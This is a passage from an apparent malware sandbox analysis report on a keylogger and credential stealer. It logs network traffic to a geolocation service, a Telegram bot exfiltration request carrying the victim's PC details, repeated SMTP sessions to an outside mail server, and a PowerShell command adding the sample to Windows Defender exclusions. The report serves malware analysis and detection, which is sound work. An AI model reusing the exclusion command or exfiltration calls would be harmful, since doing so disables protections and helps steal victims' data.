2024-09-26 11:44:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49710	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:14 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 11:44:15 UTC	674	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15887 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9R1ME7PrhhyFvhakUPR7LXc2k40Sr1kxDLQpACaMSepL9W1qfCq06xURubTieNgeNAiThQNzZx0sdc9z%2F17yKlzvQq5PJiB1oV8Ee%2FwaLoxR6GIErX5dORXacDB8Hsj9skWjXPi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c93003ddc1f42fb-EWR
2024-09-26 11:44:15 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49712	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:16 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 11:44:16 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15888 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kUL4MsZcunGFezWAznFuzZSV5m18yvHELAtarMP4qB1IFLUEENDPU3OX%2BTdZbIJmiVnJTfcosNpByLjgFjiYPv%2FVmEVBtvWS10%2FMp0bT299mHq2ZZTLWqopn7OpmKjvXc7xSBQrX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c930048e9c7c41b-EWR
2024-09-26 11:44:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49715	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:18 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 11:44:18 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15890 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LuSrCTKDRKTeQSV%2FiHedFrhp9koVPsUXLnDRs%2BAlIvTY8h6yByNzIML%2B4gRuDoJh9ubfHts0N8%2FW1q7yE2KBIi9%2BfFaAmTqWTYTn61ABu3uJJ3GhPerGqA3M4Vpt5oW77lY%2FZAGO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c930051fa8d41f8-EWR
2024-09-26 11:44:18 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49719	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:19 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 11:44:19 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15891 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ta10nn%2BDzwXvJ%2FTLgcaxoRHkJEzmz20qAZvWTiHNe7B%2F5DqNp75AdrCvegReu5gueoHDueBqMbsAfr0N%2F1pKUqqkjLnp6wfmkowXOfFNcUpfeAjcGDzLHmb0%2B2ytbCL8QJZwjaLg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c93005baf5b41f9-EWR
2024-09-26 11:44:19 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49723	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:21 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 11:44:21 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15893 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47GWzNNImlpZWqPJZVoTEC9Vwuih2ZHH4H0HjDzYJEgoFETGqgwNhcjJCeGAQ2iXm%2BHRCzScYojsthVVWyyyRenblUptJnlrg0G62g%2BLLqYldjdSzl%2F1EqYNw0hO%2F6eqTwnx7hSe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9300669a409e08-EWR
2024-09-26 11:44:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49725	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:22 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 11:44:23 UTC	674	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15895 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hw8pXxY4A3xTg8ZzHvmzx3pR7PU3W4abzGYGcH40eZS6jfZrR2rkFKYxg6A%2B3oL54uNBMFplCBH53dRUZWy9cQmlWlH6ddMVS2SwziMr%2F9pUC6ZSu54u4Q3zswuHJF2T7RXxuQfb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9300700e6417bd-EWR
2024-09-26 11:44:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49726	149.154.167.220	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:23 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-26 11:44:24 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 26 Sep 2024 11:44:23 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-26 11:44:24 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 26, 2024 13:44:30.181189060 CEST	587	49727	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:44:30 +0200
Sep 26, 2024 13:44:30.181605101 CEST	49727	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:44:30.353322983 CEST	587	49727	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:44:30.353725910 CEST	49727	587	192.168.2.7	217.12.218.219	STARTTLS
Sep 26, 2024 13:44:30.526225090 CEST	587	49727	217.12.218.219	192.168.2.7	220 TLS go ahead
Sep 26, 2024 13:44:42.027044058 CEST	587	49728	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:44:41 +0200
Sep 26, 2024 13:44:42.027209997 CEST	49728	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:44:42.462924004 CEST	587	49728	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:44:42.463134050 CEST	587	49728	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:44:42.463447094 CEST	49728	587	192.168.2.7	217.12.218.219	STARTTLS
Sep 26, 2024 13:44:42.641243935 CEST	587	49728	217.12.218.219	192.168.2.7	220 TLS go ahead
Sep 26, 2024 13:45:04.337904930 CEST	587	49730	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:45:04 +0200
Sep 26, 2024 13:45:04.338134050 CEST	49730	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:45:04.515001059 CEST	587	49730	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:45:04.515197039 CEST	49730	587	192.168.2.7	217.12.218.219	STARTTLS
Sep 26, 2024 13:45:04.696432114 CEST	587	49730	217.12.218.219	192.168.2.7	220 TLS go ahead
Sep 26, 2024 13:45:43.437735081 CEST	587	49732	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:45:43 +0200
Sep 26, 2024 13:45:43.437992096 CEST	49732	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:45:43.609600067 CEST	587	49732	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:45:43.612732887 CEST	49732	587	192.168.2.7	217.12.218.219	STARTTLS
Sep 26, 2024 13:45:43.786331892 CEST	587	49732	217.12.218.219	192.168.2.7	220 TLS go ahead
Sep 26, 2024 13:46:08.763739109 CEST	587	49733	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:46:08 +0200
Sep 26, 2024 13:46:08.763890028 CEST	49733	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:46:08.935470104 CEST	587	49733	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:46:08.935610056 CEST	49733	587	192.168.2.7	217.12.218.219	STARTTLS
Sep 26, 2024 13:46:09.107906103 CEST	587	49733	217.12.218.219	192.168.2.7	220 TLS go ahead
Sep 26, 2024 13:46:36.373044014 CEST	587	49734	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:46:36 +0200
Sep 26, 2024 13:46:36.373198986 CEST	49734	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:47:02.071041107 CEST	587	49735	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:47:01 +0200
Sep 26, 2024 13:47:02.071749926 CEST	49735	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:47:02.243545055 CEST	587	49735	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:47:02.243671894 CEST	49735	587	192.168.2.7	217.12.218.219	STARTTLS
Sep 26, 2024 13:47:43.573765039 CEST	587	49738	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:47:43 +0200
Sep 26, 2024 13:47:43.574301958 CEST	49738	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:47:43.745894909 CEST	587	49738	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:47:43.746234894 CEST	49738	587	192.168.2.7	217.12.218.219	STARTTLS
Sep 26, 2024 13:47:55.490883112 CEST	587	49739	217.12.218.219	192.168.2.7	220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 13:47:55 +0200
Sep 26, 2024 13:47:55.491156101 CEST	49739	587	192.168.2.7	217.12.218.219	EHLO 528110
Sep 26, 2024 13:47:55.944158077 CEST	587	49739	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:47:55.944339991 CEST	49739	587	192.168.2.7	217.12.218.219	STARTTLS
Sep 26, 2024 13:47:55.944634914 CEST	587	49739	217.12.218.219	192.168.2.7	250-h2-eu1.layer6.net Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN CRAM-MD5 250-CHUNKING 250-STARTTLS 250 HELP
Sep 26, 2024 13:47:56.117739916 CEST	587	49739	217.12.218.219	192.168.2.7	220 TLS go ahead

Target ID:	0
Start time:	07:44:01
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Imagebase:	0xe60000
File size:	684'032 bytes
MD5 hash:	401098A467FC699ACB2D256DA47FDACE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:44:02
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Imagebase:	0x110000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:44:02
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
